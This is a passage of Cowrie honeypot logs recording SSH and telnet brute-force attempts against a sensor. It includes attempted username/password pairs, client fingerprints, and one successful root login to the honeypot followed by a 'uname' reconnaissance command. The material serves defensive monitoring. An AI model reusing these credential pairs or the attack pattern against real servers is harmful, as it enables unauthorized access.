our128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T00:32:26.499641Z","src_ip":"212.227.235.229","session":"7e2282187dc3"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:32:34.246789Z","src_ip":"212.227.235.229","session":"7e2282187dc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58838,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c62b7944e9b","protocol":"ssh","message":"New connection: 212.227.235.229:58838 (1.2.3.4:22) [session: 6c62b7944e9b]","sensor":"my-vps","timestamp":"2025-08-31T00:32:56.798100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:32:56.798800Z","src_ip":"212.227.235.229","session":"6c62b7944e9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:32:57.105495Z","src_ip":"212.227.235.229","session":"6c62b7944e9b"}
{"eventid":"cowrie.login.failed","username":"user","password":"yu3tlymnt9k","message":"login attempt [user/yu3tlymnt9k] failed","sensor":"my-vps","timestamp":"2025-08-31T00:32:58.367200Z","src_ip":"212.227.235.229","session":"6c62b7944e9b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:32:59.675856Z","src_ip":"212.227.235.229","session":"6c62b7944e9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44664,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcfdaa47fcbe","protocol":"ssh","message":"New connection: 212.227.235.229:44664 (1.2.3.4:22) [session: dcfdaa47fcbe]","sensor":"my-vps","timestamp":"2025-08-31T00:33:00.758623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:33:01.890006Z","src_ip":"212.227.235.229","session":"dcfdaa47fcbe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:33:01.890755Z","src_ip":"212.227.235.229","session":"dcfdaa47fcbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44358,"dst_ip":"1.2.3.4","dst_port":23,"session":"7318c9349573","protocol":"telnet","message":"New connection: 212.227.125.160:44358 (1.2.3.4:23) [session: 7318c9349573]","sensor":"my-vps","timestamp":"2025-08-31T00:33:06.623357Z"}
{"eventid":"cowrie.login.failed","username":"backup","password":"password","message":"login attempt [backup/password] failed","sensor":"my-vps","timestamp":"2025-08-31T00:33:07.456353Z","src_ip":"212.227.235.229","session":"dcfdaa47fcbe"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:33:09.277844Z","src_ip":"212.227.235.229","session":"dcfdaa47fcbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43014,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6a6adca0df4","protocol":"ssh","message":"New connection: 212.227.125.160:43014 (1.2.3.4:22) [session: f6a6adca0df4]","sensor":"my-vps","timestamp":"2025-08-31T00:33:11.172847Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:33:11.198147Z","src_ip":"212.227.125.160","session":"f6a6adca0df4"}
{"eventid":"cowrie.session.closed","duration":15.228820562362671,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:33:21.852109Z","src_ip":"212.227.125.160","session":"7318c9349573"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34974,"dst_ip":"1.2.3.4","dst_port":22,"session":"2aea8ab0478c","protocol":"ssh","message":"New connection: 212.227.125.160:34974 (1.2.3.4:22) [session: 2aea8ab0478c]","sensor":"my-vps","timestamp":"2025-08-31T00:33:22.702964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:33:23.121486Z","src_ip":"212.227.125.160","session":"2aea8ab0478c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:33:23.122434Z","src_ip":"212.227.125.160","session":"2aea8ab0478c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41734,"dst_ip":"1.2.3.4","dst_port":23,"session":"e584d1107a92","protocol":"telnet","message":"New connection: 212.227.125.160:41734 (1.2.3.4:23) [session: e584d1107a92]","sensor":"my-vps","timestamp":"2025-08-31T00:33:24.595330Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52296,"dst_ip":"1.2.3.4","dst_port":23,"session":"c0ac1eb622fa","protocol":"telnet","message":"New connection: 212.227.125.160:52296 (1.2.3.4:23) [session: c0ac1eb622fa]","sensor":"my-vps","timestamp":"2025-08-31T00:33:25.529520Z"}
{"eventid":"cowrie.login.failed","username":"backup","password":"password","message":"login attempt [backup/password] failed","sensor":"my-vps","timestamp":"2025-08-31T00:33:26.271166Z","src_ip":"212.227.125.160","session":"2aea8ab0478c"}
{"eventid":"cowrie.session.closed","duration":3.0761759281158447,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:33:28.604722Z","src_ip":"212.227.125.160","session":"c0ac1eb622fa"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:33:28.724082Z","src_ip":"212.227.125.160","session":"2aea8ab0478c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52362,"dst_ip":"1.2.3.4","dst_port":23,"session":"a26a3a28a5bd","protocol":"telnet","message":"New connection: 212.227.125.160:52362 (1.2.3.4:23) [session: a26a3a28a5bd]","sensor":"my-vps","timestamp":"2025-08-31T00:33:31.737724Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33141,"dst_ip":"1.2.3.4","dst_port":23,"session":"277c0d3708e2","protocol":"telnet","message":"New connection: 212.227.235.229:33141 (1.2.3.4:23) [session: 277c0d3708e2]","sensor":"my-vps","timestamp":"2025-08-31T00:33:39.446191Z"}
{"eventid":"cowrie.session.closed","duration":15.780081987380981,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:33:40.375343Z","src_ip":"212.227.125.160","session":"e584d1107a92"}
{"eventid":"cowrie.session.closed","duration":10.089030981063843,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:33:41.826637Z","src_ip":"212.227.125.160","session":"a26a3a28a5bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58174,"dst_ip":"1.2.3.4","dst_port":23,"session":"aaaaeb059099","protocol":"telnet","message":"New connection: 212.227.125.160:58174 (1.2.3.4:23) [session: aaaaeb059099]","sensor":"my-vps","timestamp":"2025-08-31T00:33:43.603542Z"}
{"eventid":"cowrie.session.closed","duration":3.062448024749756,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:33:46.665799Z","src_ip":"212.227.125.160","session":"aaaaeb059099"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52408,"dst_ip":"1.2.3.4","dst_port":23,"session":"28a34cf42b97","protocol":"telnet","message":"New connection: 212.227.125.160:52408 (1.2.3.4:23) [session: 28a34cf42b97]","sensor":"my-vps","timestamp":"2025-08-31T00:33:46.666879Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60450,"dst_ip":"1.2.3.4","dst_port":23,"session":"d38af9056d3f","protocol":"telnet","message":"New connection: 212.227.125.160:60450 (1.2.3.4:23) [session: d38af9056d3f]","sensor":"my-vps","timestamp":"2025-08-31T00:33:50.347757Z"}
{"eventid":"cowrie.session.closed","duration":12.654488325119019,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:33:52.100585Z","src_ip":"212.227.235.229","session":"277c0d3708e2"}
{"eventid":"cowrie.session.closed","duration":10.855665445327759,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:34:01.203353Z","src_ip":"212.227.125.160","session":"d38af9056d3f"}
{"eventid":"cowrie.session.closed","duration":15.255043745040894,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:34:01.921878Z","src_ip":"212.227.125.160","session":"28a34cf42b97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56916,"dst_ip":"1.2.3.4","dst_port":22,"session":"038a61d41656","protocol":"ssh","message":"New connection: 212.227.235.229:56916 (1.2.3.4:22) [session: 038a61d41656]","sensor":"my-vps","timestamp":"2025-08-31T00:34:03.904122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:34:04.681908Z","src_ip":"212.227.235.229","session":"038a61d41656"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:34:04.682578Z","src_ip":"212.227.235.229","session":"038a61d41656"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50718,"dst_ip":"1.2.3.4","dst_port":23,"session":"cfbb760ceee0","protocol":"telnet","message":"New connection: 212.227.125.160:50718 (1.2.3.4:23) [session: cfbb760ceee0]","sensor":"my-vps","timestamp":"2025-08-31T00:34:05.670856Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59740,"dst_ip":"1.2.3.4","dst_port":22,"session":"a81831885875","protocol":"ssh","message":"New connection: 212.227.235.229:59740 (1.2.3.4:22) [session: a81831885875]","sensor":"my-vps","timestamp":"2025-08-31T00:34:07.743711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:34:07.744804Z","src_ip":"212.227.235.229","session":"a81831885875"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:34:08.050082Z","src_ip":"212.227.235.229","session":"a81831885875"}
{"eventid":"cowrie.login.failed","username":"hotfriends","password":"my45sqL_F3uc2K","message":"login attempt [hotfriends/my45sqL_F3uc2K] failed","sensor":"my-vps","timestamp":"2025-08-31T00:34:09.307373Z","src_ip":"212.227.235.229","session":"a81831885875"}
{"eventid":"cowrie.session.closed","duration":3.8728835582733154,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:34:09.543669Z","src_ip":"212.227.125.160","session":"cfbb760ceee0"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:34:10.612890Z","src_ip":"212.227.235.229","session":"a81831885875"}
{"eventid":"cowrie.login.failed","username":"backup","password":"password1","message":"login attempt [backup/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:34:10.634063Z","src_ip":"212.227.235.229","session":"038a61d41656"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:34:12.221518Z","src_ip":"212.227.235.229","session":"038a61d41656"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58562,"dst_ip":"1.2.3.4","dst_port":23,"session":"eccb4ebac2e1","protocol":"telnet","message":"New connection: 212.227.125.160:58562 (1.2.3.4:23) [session: eccb4ebac2e1]","sensor":"my-vps","timestamp":"2025-08-31T00:34:12.819106Z"}
{"eventid":"cowrie.session.closed","duration":10.031823635101318,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:34:22.850872Z","src_ip":"212.227.125.160","session":"eccb4ebac2e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48012,"dst_ip":"1.2.3.4","dst_port":22,"session":"927bac6a66fd","protocol":"ssh","message":"New connection: 212.227.125.160:48012 (1.2.3.4:22) [session: 927bac6a66fd]","sensor":"my-vps","timestamp":"2025-08-31T00:34:26.325342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:34:26.800968Z","src_ip":"212.227.125.160","session":"927bac6a66fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:34:26.801969Z","src_ip":"212.227.125.160","session":"927bac6a66fd"}
{"eventid":"cowrie.login.failed","username":"backup","password":"password1","message":"login attempt [backup/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:34:28.975015Z","src_ip":"212.227.125.160","session":"927bac6a66fd"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:34:30.539352Z","src_ip":"212.227.125.160","session":"927bac6a66fd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60786,"dst_ip":"1.2.3.4","dst_port":22,"session":"15b68364a1e2","protocol":"ssh","message":"New connection: 217.72.205.35:60786 (1.2.3.4:22) [session: 15b68364a1e2]","sensor":"my-vps","timestamp":"2025-08-31T00:34:36.094320Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:34:36.095518Z","src_ip":"217.72.205.35","session":"15b68364a1e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45442,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5d815199712","protocol":"ssh","message":"New connection: 212.227.125.160:45442 (1.2.3.4:22) [session: b5d815199712]","sensor":"my-vps","timestamp":"2025-08-31T00:35:00.645159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:35:00.645880Z","src_ip":"212.227.125.160","session":"b5d815199712"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:35:00.719487Z","src_ip":"212.227.125.160","session":"b5d815199712"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:35:00.944028Z","src_ip":"212.227.125.160","session":"b5d815199712"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:35:01.352618Z","src_ip":"212.227.125.160","session":"b5d815199712"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:35:01.353637Z","src_ip":"212.227.125.160","session":"b5d815199712"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:01.429143Z","src_ip":"212.227.125.160","session":"b5d815199712"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:01.430697Z","src_ip":"212.227.125.160","session":"b5d815199712"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40854,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7783701d8a7","protocol":"ssh","message":"New connection: 212.227.235.229:40854 (1.2.3.4:22) [session: d7783701d8a7]","sensor":"my-vps","timestamp":"2025-08-31T00:35:07.275100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:35:08.069665Z","src_ip":"212.227.235.229","session":"d7783701d8a7"}
